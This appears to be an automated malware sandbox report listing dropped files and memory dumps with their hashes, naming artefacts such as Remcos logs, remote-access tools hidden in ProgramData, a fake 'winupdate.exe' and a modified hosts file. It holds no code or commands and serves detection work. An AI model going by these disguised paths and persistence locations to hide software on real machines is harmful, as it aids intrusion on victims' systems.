235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8ae85e5cf3f16b6f88fea75afff52ab0

SHA1
b5e295ed2ddf08be4d80d37a9ecd65c25df6e517

SHA256
d45c4ed2ae15c6079c37164fa5f36c8413ad19234f11bf698f0db413788e78d8

SHA512
3ab8a201e3d426262d40d00a4d9f37c323df95f2edcb3a1a831c081a64825f5cf5cd37e7f9b9ed38eda7e09989f7ba9f5f9146ee49929acd1d61f17058b0c4eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
57d5636cf19706fbbd7b4f22dd021e66

SHA1
4f8eade2a567064c8e2f711333f59d0c2f32ace9

SHA256
7ad1541c32bd8190e8e949d9c97a39fc65cb327f7f9f5eb23e5e888a2b94c023

SHA512
b755cc197864b65207dbcf79007ebb652bfee509f7118b03894900d9cb5223e81e82ea5ac943427b34c6272d568e9a3d5f9ee2c69862e09d123e89e3961d4b42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
93eb9fd64a5beeeb9f2fa416146e434d

SHA1
edb71670e23ba65aaa2b28070bf23b6d298d58d0

SHA256
9cfad22a587168f372f64f796205447b71fc25509225f070702315fb4a6447e5

SHA512
bfabfb636b48e526e1103705c46cd04ff249f029d5b73eba75d29cca5a2136c8b3bcf86b7fafdf470b0730c5bfb54d68e003acd643cfc5fb3a71cec62ab5517d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
37baf21f6884d62dd3fae3bcac0e3f54

SHA1
86387f81e0e639f4b89ac148a2611dbe17c692e5

SHA256
fd6b196dedb818f06d7e045bc0ca39921765ba16deeb416261c8605de41aa1be

SHA512
13d36ff793b191e5036fad9a998d653eba70f27900f205c8eb1e2b336837f6a6b9977e0129b0645844b6d40a08883ccbc71b132e22f5577c5db8b44ad4f74461

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
37a7be1b904732b0af1b037fe828f075

SHA1
444dbd2e5ada09f5f5e7b18ff3cf3a1fc1af90e1

SHA256
2939142411d64f16dda69ab72c45b190a87b4d219abf34bc2ede77906243681b

SHA512
51b09ab058c95ce2e2c8c4dac3d81801ddba7234e357fd8ec2b5c55216255a2a77e7539c6b5638b26d18d6e68e3536740d4b8a6e73a62c3909beec135b252500

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
46e65e168be84a0e6186a804ac95d81f

SHA1
c972c00ae211e251daa299aeba8e300724185cb9

SHA256
d91f60489e231074af0486975e24961112571f715d3491d3e3c869141df1828b

SHA512
ebd2d1b7c0da30ca185d5136a047989a40ae2642d197c6e628cc27cd9e0b5a5041061c1496a20993f6ce429293f1aff61a1688980716493480aa37909b855f57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
60bc2577d218cc5ae951704c1f5737a9

SHA1
7b070befd996c60e29004088eb1aef10aea389a2

SHA256
bd0e200191938145faae2be6b3e7df42ce068b68070a95fdcf7b565297e81861

SHA512
2262d329e69e0bfa7a923f1ab0c4a29c2c4a280677510cbee22be05ab261f014ef583dbb413c8253d53f0e1d1bb6dc58c37b3be27a405d9876f5d5e40016fa4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1af56f607fc9ed20c1e08ae07db58276

SHA1
c8d21ac93721405544aae3d09b5dbf2df4833553

SHA256
ae6ffae18c6fef8dcb0a898b07cb5a9d09b3982cd2a033b493dc83f69f44093f

SHA512
fb53068ee8ee9aa4f3508f5e8ebb0312795ba6b77204abc84ed24c093e43347e21f4d9506b67fcb7cdb38898e8cadb1d618eb903c766ba0a5c8611be103706e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
79f8b60efb8855630f9a570a4e84d4d3

SHA1
0fd50dc3f60e86a967169ba2f83dfda360b5f647

SHA256
a9878f63a5ed95f2d293f9603c68fb2638da7145028e9d530f5239fc6cb25f8f

SHA512
5f98a1ff0579aa0e4b14949a181090cc1cbb740bd7aedcbf11117fa4b01d9625758c2af4a5b11889d882f7bee594510ad81ab81190cd4bc7ec9e98ce3b61d1e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5c32cf.TMP

Filesize
1KB

MD5
9525eb3811bb30c575eb8b65cd0f874a

SHA1
4604bbe46b3ec256a549547751b05dd6ead9a3ef

SHA256
aa50ebede32a268c0d479a1fbc4d65088010c6507be81f9c7b31355d87e912e3

SHA512
59b0b165108c203b649b9a4218841e0bd14d1efb387e58621cad9fbc4cf8c58e7c0afee312585316cd9c703c52b9c962cd9d9cf56600174fdbbe48f1da4bd49d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
007235d98ab6f44b3b3955e9c69fe6ef

SHA1
cbd31bdd207f46ac6c899d8f4e11589e138e776d

SHA256
9686ff0cd7a1a0d8375136a6dee505a2ce90cf2eb69d434b08a2169899d79de1

SHA512
b4dd50da76d4426020014dff7961c5712a07e4368cab4273a26f2580200aeb3958af00a383f7478aa3fbca055d59d5b8d9957f6376a626f27f827a5ebbab8e51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
437c1add174b2ba2a68ee4d1de5fede5

SHA1
f590afd06ecbb2726e80ab89a9fba51c699aa3fb

SHA256
45fe0d3df9270cae4e9a54df1f937d683a012ab022ee216ce22bce965cec941d

SHA512
498bb6eecbc79d23afc3510a70f298d6bc7b0b56e06d0a7f91e4bd27709738125e6ac08b304b20ad66a5bce1169847d954124cd8a9551fb32b47edb4c9a50ce8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
f5cbc7d05cdacf92d26f9358cd640465

SHA1
746436b751c817051817a65940874301bf22e0df

SHA256
c10cc6585988fcade46ca194c43ecb790b79e5c82664a1f098a96dca3c2e5a63

SHA512
ff752024047bdf98f0dce308fabcf6b64672807072ca9b324fecbf94eea96090f1c34e23eccccc1119d02faef1dfc8b1164eb389afa5e4767c427f2eb19dc0c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

Filesize
8KB

MD5
f7f70d5d9eb38d6687c39c3f40b7c133

SHA1
96e360e29833ab5ffb1697aa5864f560a21f00ee

SHA256
26aee0bcbce557561444fb11c020aa505f9093d84f39f1d8b5a0099adf2d99d0

SHA512
595e40aa0ba0aa2286a45176f7dbdb99111ffcab0c29f2043d3ccd82231f11ba84309f9ca070e41ec62bbb9611789dc6d289268fe856bdd1323c725b16630099

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

Filesize
8KB

MD5
8b3d38d1eb4df3f2fbb87c7dacfd6b7d

SHA1
4d183ae141175acbfebf1317f07d831331b4f458

SHA256
dfbc1e97f2e87bc6d187d68308d74440eb9692bf53641ab5d9cb875b9072da5d

SHA512
92d45484f4daace69e3d2edeeb5058d1274861e6e9dfdc6a0d2cb3b5938216960cd954702a215154524eae2bc553a45535aca5ffefdf37c8fbcb242c4e296ff6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CA6FCBBE.emf

Filesize
5KB

MD5
0ed5bc16545d23c325d756013579a697

SHA1
dcdde3196414a743177131d7d906cb67315d88e7

SHA256
3e430584cd9774ea3b21d8e19b485b48212fe356776158dd5f3c5f63a5bde7d3

SHA512
c93072d11058fa50e3b09ff4da9f3dbe2637c2b5df05e616bd8ddd04557ea1e8b0db106b1545fad334619118c467776f81cf97ca52d3f2fcbbe007f30032b8af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDDB66.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xc2w1dcb.ewb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aut3A51.tmp

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Users\Admin\AppData\Local\Temp\autBB52.tmp

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.bat

Filesize
187B

MD5
08d2e4a2d9e2c22025fc369cc551ca6c

SHA1
fbb518fd33cf1c752f762dc43d904cacad3aec00

SHA256
0e7dc72dce87f7448c7e65dfdae1ffebec653e4f066807a94993feb1039787bb

SHA512
92993473f027749718df243d6ac9480c1607cf908b3b01fc7dd92bd6afe4b8f3b0ae17c79fc75ed79c52cf79fc5f7bdc1814a4d132fd80202d80ba6539577686

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7154.tmp

Filesize
1KB

MD5
7aa0c90367c1f02ace41459ac2e7d3ad

SHA1
7b2b980d23e49b899eb2e67bf38771e1b63e1a88

SHA256
f80dccc6fe477fdc40a55d8c4d88303aa4de282d57386c054915c1031d18c421

SHA512
41bcee5491b2a687fc2cdc0eead4452d46e1cf39b95a43dcdaff8bfc206d9b1b6023207eecc68bbe7bf45a7cbcdb8fe58999ea549edcf217b1e95450b189533c

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbhja.rtf

Filesize
816KB

MD5
d14c041019d0e751d54f1b8c36dc591d

SHA1
46eba013fa6aeb31e248e69c8afcbc467bf40f44

SHA256
5ec0d8fca9887b7b8a7d50676aee5f24dc757f9887fca4f0bc2df741b9a38cc7

SHA512
584e01661d2e691b68afabd121c198dbe62cbbffded0ca46c6c8be0318fc4d9213dc60428e5807bfbb39bf8e48e0032d4b5fc1a4526a2d62d5d77a634e3cd2ee

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
290B

MD5
f13b0ada426b02b7f3d2bf303e93ab6e

SHA1
880cb1762dd53fec4db540f8a958f052b8c3b3f5

SHA256
d6e0f62b9ddcbce0361f2db8f5f4e3b1e03e9cc50a87b9766691ba64cc855ffc

SHA512
0c76f59950b4e36f8a8bb30fb0130ef97767ad66f38a1ca1d9a066f11ffa975e944df7daff50f4eb72b81bcdde4698f2bb85e3f502611acfb7a7469a7e20637b

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Axam.a.exe

Filesize
119B

MD5
d6174dce867e791a3a08df6b8b772598

SHA1
b777cc1c3538f92212c36d8bdf5665b5e0976b0f

SHA256
47b92d9da91c884b7cb01ba401b5591c7b5cec7d24abc2b08a2d72a86eca8576

SHA512
cb1c36e8297cea3f173263d3a01d00c5cb2669a2d13a3fb1849132bb345400ed9be5affdade63fcd5eddafdfa6990e868befe02d37777f9995ed4272371bb937

Download Submit
C:\Windows\SysWOW64\Userdata\Userdata.exe

Filesize
92KB

MD5
fb598b93c04baafe98683dc210e779c9

SHA1
c7ccd43a721a508b807c9bf6d774344df58e752f

SHA256
c851749fd6c9fa19293d8ee2c5b45b3dc8561115ddfe7166fbaefcb9b353b7c4

SHA512
1185ffe7e296eaaae50b7bd63baa6ffb8f5e76d4a897cb3800cead507a67c4e5075e677abdbf9831f3f81d01bdf1c06675a7c21985ef20a4bae5a256fd41cc0f

Download Submit
C:\Windows\SysWOW64\Windupdt\winupdate.exe

Filesize
756KB

MD5
c7dcd585b7e8b046f209052bcd6dd84b

SHA1
604dcfae9eed4f65c80a4a39454db409291e08fa

SHA256
0e8336ed51fe4551ced7d9aa5ce2dde945df8a0cc4e7c60199c24dd1cf7ccd48

SHA512
c5ba102b12d2c685312d7dc8d58d98891b73243f56a8491ea7c41c2edaaad44ad90b8bc0748dbd8c84e92e9ae9bbd0b0157265ebe35fb9b63668c57d0e1ed5f2

Download Submit
C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier

Filesize
92B

MD5
c6c7806bab4e3c932bb5acb3280b793e

SHA1
a2a90b8008e5b27bdc53a15dc345be1d8bd5386b

SHA256
5ba37b532dbb714d29f33e79dacb5740096fd1e89da0a07b9b8e6b803931c61a

SHA512
c648be984413fdbaeb34808c8164c48b5441a8f3f35533b189f420230e5e90605c15fde2ce0d9fe42e9755c594dd1ef32de71a24016277ad2cef2f9afcf0ad93

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
627B

MD5
ee290fa69bb29eb0daeaf638d3d67641

SHA1
59581cb3d475cb28ba2924c8fedc421f573f963c

SHA256
d116446f9002b4f9afd10a99dd6c0537c88f0708a7c4cd7560d18623c7e9173d

SHA512
3f21f71f32f3f2c0cc87d5a9a04fc0e218eabffe11adbd0c408d22f4f50f2b1bdccf28cb1d2baf1950bc467bee0d45b6a538142b187aba82f0080e20f8b920c8

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
947B

MD5
77d3e85aef85f29e7cda0a9095cce62b

SHA1
ecbb3e669614a60994122a04306ce3ccb9534f68

SHA256
9e7e19719618cab67fd2ac3e8b5ea0cd52b80d353b16eb5aede4961eed4e4e76

SHA512
a1b06b2a3a3d789e92aef4217e6f792825b349568c2e94cb30c38710076325d9af207d8f5425f6c248c511b3672231065662de2616654c88f9af48bdf98d0e08

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
4f948aa9e2f745b38844ddb3f0809e38

SHA1
0657bf6511e99d29ebb8c71bd98a10ab9dcce422

SHA256
6d12e5c9a434df43a1df9b5294e359ea58025d20cf82ef84fa6b38d49b9e0c02

SHA512
8e27763a4b095b441c6fa70c24da8e807f1917254c3e1166c654c85ce758607ead139f6c60dcfc034a2f58d67bab114c479d8939acafde3c0d1005b393f7233c

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
232e552aa34310633b594737ed0da5a0

SHA1
f53d7ad381354484b3a97ef7bfd43875b23648d3

SHA256
c6764dbfeea48648202e0625ac0a6aee6549b5506ef6c0dd4d74974382eaf568

SHA512
167306680bd82a0307ead8715d4db62e7aa2f43e8958e9e5d1179555fadaa54e4988bdb75a32b4dd25435c448b3658393f6d17f6380a6fd612ce93e3807f64d0

Download Submit
C:\Windows\SysWOW64\remcos\logs.dat

Filesize
1KB

MD5
07e1b810fbec3590d2e77459ebab0bbe

SHA1
4aea31a6b44b5f6e007764cfc924f6f412b706b4

SHA256
a2223e625ed88e9fb118374cacd081e55b64a4539bf3e466d4e53a2d7aa2aabe

SHA512
d22391aae19ad8b28955875a901cef3d06d3ec43196833985c1582ff7c29a464f899d6b1ab41344a11ee0bb15caed5e36480e91395a98fa12bab601c16fcf41f

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
ea3152149600326656e1f74ed207df9e

SHA1
361f17db9603f8d05948d633fd79271e0d780017

SHA256
f895f54a7397294132ebe13da0cf48f00028f5ccc81eac77eecafdec858e7816

SHA512
5f79b3295a6a2c4b5c5720e26741ae5da2008165bcde01472e19362f7ffd4edabaea348bb99c2850871045cfb07fb0e51e6c3db7b2e278732a9f15f5b34f1a52

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
4KB

MD5
abf47d44b6b5cd8701fdbd22e6bed243

SHA1
777c06411348954e6902d0c894bdac93d59208da

SHA256
4bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754

SHA512
9dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77

Download Submit
C:\Windows\System\msload.exe

Filesize
12KB

MD5
9a53cd6b36825e500254fca152e1193b

SHA1
d18642e2d45e8886abc6b0fc57f9624e4c7321c5

SHA256
c93d4fe28aac9d63003c10585d7db9b32950af33387e45f1cd35d3c5dc128f47

SHA512
c5de4f00198ab3d27a77ccb9e1ced649dbe1aef6d7f68b94832693825517d032aa8e21ccf95f952e726ef4b8540e7a0402373dec07e4dda2fc6b49db00246328

Download Submit
C:\Windows\System\scr.scr

Filesize
28KB

MD5
71c981d4f5316c3ad1deefe48fddb94a

SHA1
8e59bbdb29c4234bfcd0465bb6526154bd98b8e4

SHA256
de709dacac623c637448dc91f6dfd441a49c89372af2c53e2027e4af5310b95d

SHA512
e6ed88ce880e0bbb96995140df0999b1fb3bd45b3d0976e92f94be042d63b8f5030d346f3d24fbadd9822a98690a6d90ba000d9188b3946807fd77735c65c2b1

Download Submit
C:\programdata\install\cheat.exe

Filesize
4.5MB

MD5
c097289ee1c20ac1fbddb21378f70410

SHA1
d16091bfb972d966130dc8d3a6c235f427410d7f

SHA256
b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2

SHA512
46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

Download Submit
C:\programdata\install\ink.exe

Filesize
112KB

MD5
ef3839826ed36f3a534d1d099665b909

SHA1
8afbee7836c8faf65da67a9d6dd901d44a8c55ca

SHA256
136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

SHA512
040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

Download Submit
memory/236-692-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/236-691-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/852-2181-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/852-2174-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1188-615-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1188-460-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1188-467-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1188-372-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1460-2063-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1460-2056-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1556-2072-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1556-2065-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3048-466-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3048-458-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3048-459-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3048-358-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3048-614-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3060-468-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-471-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-610-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-613-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-612-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-611-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-474-0x00007FF854C20000-0x00007FF854C30000-memory.dmp

Filesize
64KB

Download
memory/3060-473-0x00007FF854C20000-0x00007FF854C30000-memory.dmp

Filesize
64KB

Download
memory/3060-472-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-469-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3060-470-0x00007FF857470000-0x00007FF857480000-memory.dmp

Filesize
64KB

Download
memory/3412-654-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3412-451-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3412-587-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3412-465-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3412-462-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3616-463-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3616-464-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3896-688-0x000001C901DC0000-0x000001C9026D4000-memory.dmp

Filesize
9.1MB

Download
memory/4540-690-0x0000000010410000-0x000000001047E000-memory.dmp

Filesize
440KB

Download
memory/4716-454-0x0000000000F00000-0x0000000000F08000-memory.dmp

Filesize
32KB

Download
memory/4716-453-0x000000001D9D0000-0x000000001DA6C000-memory.dmp

Filesize
624KB

Download
memory/4716-452-0x000000001D420000-0x000000001D930000-memory.dmp

Filesize
5.1MB

Download
memory/4716-376-0x000000001C1F0000-0x000000001C6BE000-memory.dmp

Filesize
4.8MB

Download
memory/4716-375-0x000000001B690000-0x000000001BABE000-memory.dmp

Filesize
4.2MB

Download
memory/4832-653-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/5068-655-0x0000011208C80000-0x0000011208C9E000-memory.dmp

Filesize
120KB

Download
memory/5232-2259-0x0000014474600000-0x0000014474622000-memory.dmp

Filesize
136KB

Download
memory/5592-2713-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/5592-2081-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/5844-2108-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/6004-2714-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/6004-2097-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/6092-2272-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/6092-2251-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/6104-2716-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/6104-2100-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/6396-1924-0x0000000005B50000-0x0000000005B78000-memory.dmp

Filesize
160KB

Download
memory/6396-1923-0x0000000006230000-0x00000000062CC000-memory.dmp

Filesize
624KB

Download
memory/6396-1910-0x0000000000900000-0x0000000000956000-memory.dmp

Filesize
344KB

Download
memory/6396-1920-0x0000000005C80000-0x0000000006226000-memory.dmp

Filesize
5.6MB

Download
memory/6396-1921-0x00000000057B0000-0x0000000005842000-memory.dmp

Filesize
584KB

Download
memory/6396-1922-0x0000000005790000-0x0000000005798000-memory.dmp

Filesize
32KB

Download
memory/6648-2317-0x00000000007F0000-0x00000000008DC000-memory.dmp

Filesize
944KB

Download
memory/6648-2313-0x00000000007F0000-0x00000000008DC000-memory.dmp

Filesize
944KB

Download
memory/7124-2113-0x0000000005B10000-0x0000000005B54000-memory.dmp

Filesize
272KB

Download
memory/7124-2203-0x0000000005AC0000-0x0000000005AE2000-memory.dmp

Filesize
136KB

Download
memory/7124-2013-0x0000000000130000-0x0000000000182000-memory.dmp

Filesize
328KB

Download
memory/7124-2107-0x00000000050B0000-0x00000000050B8000-memory.dmp

Filesize
32KB

Download
memory/7124-2112-0x0000000005960000-0x0000000005968000-memory.dmp

Filesize
32KB

Download
memory/7124-2014-0x0000000002490000-0x00000000024A4000-memory.dmp

Filesize
80KB

Download